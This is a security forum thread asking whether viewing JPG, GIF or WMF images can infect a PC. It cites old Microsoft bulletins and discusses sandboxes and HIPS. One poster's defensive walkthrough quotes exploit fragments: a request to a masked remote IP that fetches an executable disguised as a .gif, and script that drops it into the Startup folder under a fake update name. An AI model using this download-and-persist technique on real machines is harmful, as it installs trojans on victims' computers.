malware enbeded in .jpg, .doc

Regarding .jpg able to infect, what about the .jpg files your browser loads while surfing the net ?

Can this simple behaviour infect one's system ? (Only the viewing of .jpg images)

 

if it's just a normal jpg with appended a malicious executable yes, you have to have a malware already active on the system able to split the malicious code from the image and execute it.

If the jpg is a malformed image created to exploit some security flaw, it could execute malicious file by itself.

 

Yes, it could. Just an old example of what happened in the past:

http://www.microsoft.com/technet/security/bulletin/MS04-028.mspx
http://vil.nai.com/vil/content/v_144365.htm

 

Agree.

Yes but ..
any file type could be created to exploit a security flaw...
its just the humble jpg that it has actually happened with.

 

I see thanks! Would a HIPS be able to intercept the wmf trying to control the dll in question? What about DefenseWall, would it be able to stop this sort of exploit? What if the image was downloaded via a properly configured sandboxed browser, into a properly configured sandboxed folder and opened in another properly configured sandboxed folder? I cant see it doing any harm then.

 

A similar exploit would emerge a year or so later:

Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (912919)
http://www.microsoft.com/technet/security/bulletin/ms06-001.mspx

----
rich

 

This technique was used in past remte code execution exploits.

Here, the exploit code downloads a file with .gif extension:

Code:

obj_msxml2.open("GET","http://85.xxx.xxx.221/cnte-oiduuyes.gif

AE v.2 recognized the file as a binary executable by code analysis and blocked from downloading with Copy Protection.

​

AV later detected this file as trojandownloader.murlo.

Continuing with the exploit: the .gif file would cache:

​

Now, if I d-click to open, the image editor returns an error because it is not an image file, and the image editor cannot run executable files:

​

But the purpose of the file with spoofed extension was not to have the user open it, rather, the code copied/renamed it to a Startup Folder with the .exe extension:

Code:

daustart=obj_WScript.SpecialFolders("AllUsersStartup");

var fn = daustart+"\\ms_update_0704_kb74073.exe";

On reboot, the user's computer would run the file. Here, any number of security products with Execution Protection would intervene:

​

With no protection, this trojan file would run and a user might not question an update file running.

REFERENCES

http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx

http://vil.nai.com/vil/content/v_139196.htm

----
rich

 

Wow, Thanks a lot Rich, very informative posts as always.
Good work

 

yes, that's what I've written before He just asked about jpeg files

 

You are welcome.

----
rich

 

Does Prevx detect this? Before or after the .jpg is opened?

 

Yes, that's what I'm thinking mate. I don't think any harm can be done if everything you introduce to your computer remains sandboxed. I'm sure the Prevx dude would agree with this too.

 

In December 2005 when the 2nd WMF exploit surfaced, there was a thread at DSLR that followed the exploit, and several of us tested the URL. At least three products successfully intercepted the .wmf file from launching the executable:

• Anti-Executable (see screen shot here: http://www.urs2.net/rsj/computing/tests/wmf_zeroday )
  
• Process Guard
  
• Software Restriction Policies.

I don't have screenshots for the latter two.

Today, any product with execution protection would block the .wmf file from launching the executable. (AE blocks it from downloading to disk)

REFERENCE

* Windows WMF 0-day exploit in the wild
http://isc.sans.org/diary.html?storyid=972

----
rich

 

Having everything staying in the sandbox, must be safe.

What if I want to record .jpg's to a DVD, is it possible record the sandbox with the .jpg's in the sandbox? Would they remain sandboxed on the DVD?

Thanks for all the information! Very interesting.

 

For those who'd like more background info on Image file exploits, i've written a thread which you might be interested in.


https://www.wilderssecurity.com/showthread.php?p=1531359#post1531359

 

I am interested to know how a HIPS or Sandbox will respond to such malware.

 

Is there any way now to test it?

Thanks

 

i assume a sanbox like sandboxie wuld render the vulnerability useless since it wuld be all contained.

 

As long as it doesn't call and manipulate another process that's outside the sandbox.

 

i dont see how it wuld be able to with a sandboxie like program

 

Never said it would be easy...after reading several of Arran's posts regarding this...anything is possible.

 

I remember interesting play with this exploit. I remember you wrote an article that time with many screenies, do you still have that online?

Thanks

 

Yes, the entire article is here:

http://www.urs2.net/rsj/computing/tests/redirect

This exploit was originally discovered by noway a couple of years ago. It was a sophisticated and ahead-of-its-time exploit:

1) one of the first Google redirect exploits (using an appended URL), where the user is taken from a compromised legitimate site to one with malicious code to download malware.

2) installation of rogue software (WinAntiVirus2006) by remote code execution.

3) Use of a spoofed executable (EXE disguised as GIF)

4) use of evasive tactics to avoid repeated connections to the malware site, helping to avoid detection.​

No matter the sophistication of the exploit, the end goal is always the same: to download/run a trojan executable file. And as you and I and several others showed back then, having proper protection in place nullifies the attack in any case.

As a friend likes to state: Even though new ways of remote code execution exploits surface (now we have redirects by SQL injection of legitimate sites), nothing's changed: The emperor has no clothes.*

-rich


* http://en.wikipedia.org/wiki/The_Emperor's_New_Clothes#Colloquial_use_as_metaphor

 

For those who asked, and want to test your PC for Graphics Vulnerabilities, i've uploaded a Zipped folder with a whole buch of different test files. These include WMF's and other types too.

https://www.wilderssecurity.com/showthread.php?p=1531359#post1531359

 

Hi Rmus,

Thanks for your response, enlightening as always. However I am particularly interested in the previous wmf exploit which uses GDI32.DLL to call out to the malware writer who then has control of your entire system. Would a HIPS have prevented the exploit from controlling gdi32.dll? Furthermore how could malware give someone control of your entire system using only a trusted windows dll? Could you explain to me exactly how this exploit works, and what if anything could have stopped it? Im assuming sandboxie, but i dont know if its certain.

Also this was a question asked by SSJ, but I dont think anyone responded...so I will ask again: would a software firewall prevent gdi32.dll from calling out? Thanks.